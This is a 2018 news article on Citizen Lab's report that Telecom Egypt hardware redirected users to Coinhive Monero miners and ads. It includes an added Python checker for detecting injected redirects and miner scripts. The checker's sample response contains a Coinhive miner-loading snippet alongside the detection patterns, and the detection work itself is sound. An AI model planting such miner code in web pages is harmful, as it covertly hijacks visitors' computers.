Egyptian Telecom Giant Redirecting Internet Users’ Computers To Mine Monero

Crime, News | March 12, 2018

The University of Toronto’s Citizen Lab has reported that the Egyptian government has been using network hardware to covertly redirect citizens’ computers to malware that mines the Monero cryptocurrency.

In its report, the technology research lab identified a scheme it calls “AdHose” that secretly redirects Egyptian Internet users’ web traffic either to malware that uses their computers to mine Monero or to advertisements. AdHose relies on hardware installed within the networks of Telecom Egypt.

The report said the scheme has two modes: “spray mode” and “trickle mode.” In spray mode, any website that an affected user tried to visit over plain HTTP would have the browser redirected to either an ad network or Coinhive, a browser-based Monero-mining script. Because the redirect is injected into unencrypted traffic, sites reached over HTTPS are not affected in this way. One scan in January found that 95% of the more than 5,700 devices observed were affected by AdHose.

In trickle mode, only attempts to open certain URLs redirect users to these ads or mining scripts. The report names two such domains: one that was formerly the website of the Pope of the Coptic Orthodox Church of Alexandria, and one that was formerly a porn site.
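As an added illustration (not code from the article or from Citizen Lab), the following Python checker flags the two symptoms a plaintext HTTP response would show if an AdHose-style middlebox had touched it: a 3xx redirect whose Location leaves the site the user actually requested, and a page body that loads a Coinhive-style miner. The hostnames, the sample responses and the specific Coinhive script indicators are constructed for this example and are assumptions, not data from the report.

```python
import re
from urllib.parse import urlsplit

# Assumed indicators (an assumption for this example, not taken from the
# Citizen Lab report): the Coinhive loader script and its mining API as they
# appeared on pages that embedded the miner.
MINER_INDICATORS = (
    re.compile(r"coinhive\.min\.js", re.I),
    re.compile(r"CoinHive\.Anonymous\s*\(", re.I),
)


def registrable_domain(host):
    """Crude eTLD+1 (last two labels). Adequate for the constructed samples;
    a production tool should consult the public suffix list instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def parse_http_response(raw):
    """Split a raw HTTP/1.x response (bytes) into (status, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("utf-8", "replace")


def classify_response(requested_url, raw):
    """Return findings for one plaintext-HTTP response.

    ("injected_redirect", status, location) : 3xx whose Location leaves the
                                              registrable domain we asked for
    ("miner_script", status, pattern)       : body references a Coinhive-style miner
    An empty list means nothing suspicious was seen.
    """
    findings = []
    status, headers, body = parse_http_response(raw)
    req_domain = registrable_domain(urlsplit(requested_url).hostname or "")
    if 300 <= status < 400 and "location" in headers:
        loc_host = urlsplit(headers["location"]).hostname or ""
        # Same-site redirects (e.g. http -> https upgrades) are normal;
        # only a cross-domain Location is treated as a possible injection.
        if registrable_domain(loc_host) != req_domain:
            findings.append(("injected_redirect", status, headers["location"]))
    for pattern in MINER_INDICATORS:
        if pattern.search(body):
            findings.append(("miner_script", status, pattern.pattern))
            break
    return findings


# Constructed sample responses (not captured traffic).
SAMPLE_CLEAN = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                b"<html><body>hello</body></html>")
SAMPLE_SAMESITE = (b"HTTP/1.1 301 Moved Permanently\r\n"
                   b"Location: https://news.example.com/\r\n\r\n")
SAMPLE_REDIRECT = (b"HTTP/1.1 307 Temporary Redirect\r\n"
                   b"Location: http://ads.example.net/click?id=1\r\n\r\n")
SAMPLE_MINER = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                b"<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>"
                b"<script>var m=new CoinHive.Anonymous('SITE_KEY');m.start();</script>")

REQUESTED = "http://news.example.com/"


def demo():
    """Run the checker over the four constructed samples."""
    return {
        "clean": classify_response(REQUESTED, SAMPLE_CLEAN),
        "samesite": classify_response(REQUESTED, SAMPLE_SAMESITE),
        "redirect": classify_response(REQUESTED, SAMPLE_REDIRECT),
        "miner": classify_response(REQUESTED, SAMPLE_MINER),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result or "no findings")
```

In practice one would feed the function responses captured from a plain-HTTP fetch of a known-benign page (which is how a middlebox in spray mode betrays itself) and compare against the same page fetched over HTTPS, which the injection cannot alter.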

The hardware used to implement AdHose is Sandvine PacketLogic devices, which Citizen Lab has also associated with government surveillance in Turkey and Syria. The same devices double as a censorship tool, blocking access to news outlets such as Al Jazeera and NGOs such as Human Rights Watch.

Sandvine denied that its products possess the capabilities described in the report. The company said based on a preliminary review of the report, certain Citizen Lab allegations are technically inaccurate and intentionally misleading.

“We have never had, directly or indirectly, any commercial or technology relationship with any known malware vendors, and our products do not and cannot inject malicious software,” Sandvine said in a statement. “While our products include a redirection feature, HTTP redirection is a commodity-like technology that is commonly included in many types of technology products.”

The lab also found similar schemes in Turkey and Syria, although there, instead of being sent to crypto mining or ads, users were served spyware when they believed they were downloading legitimate anti-virus programs.

Coinhive has previously been linked to several large cryptojacking incidents: its mining script has been found in Google’s DoubleClick ad services, on the Ultimate Fighting Championship website and on the site of the TV network Showtime, among many others.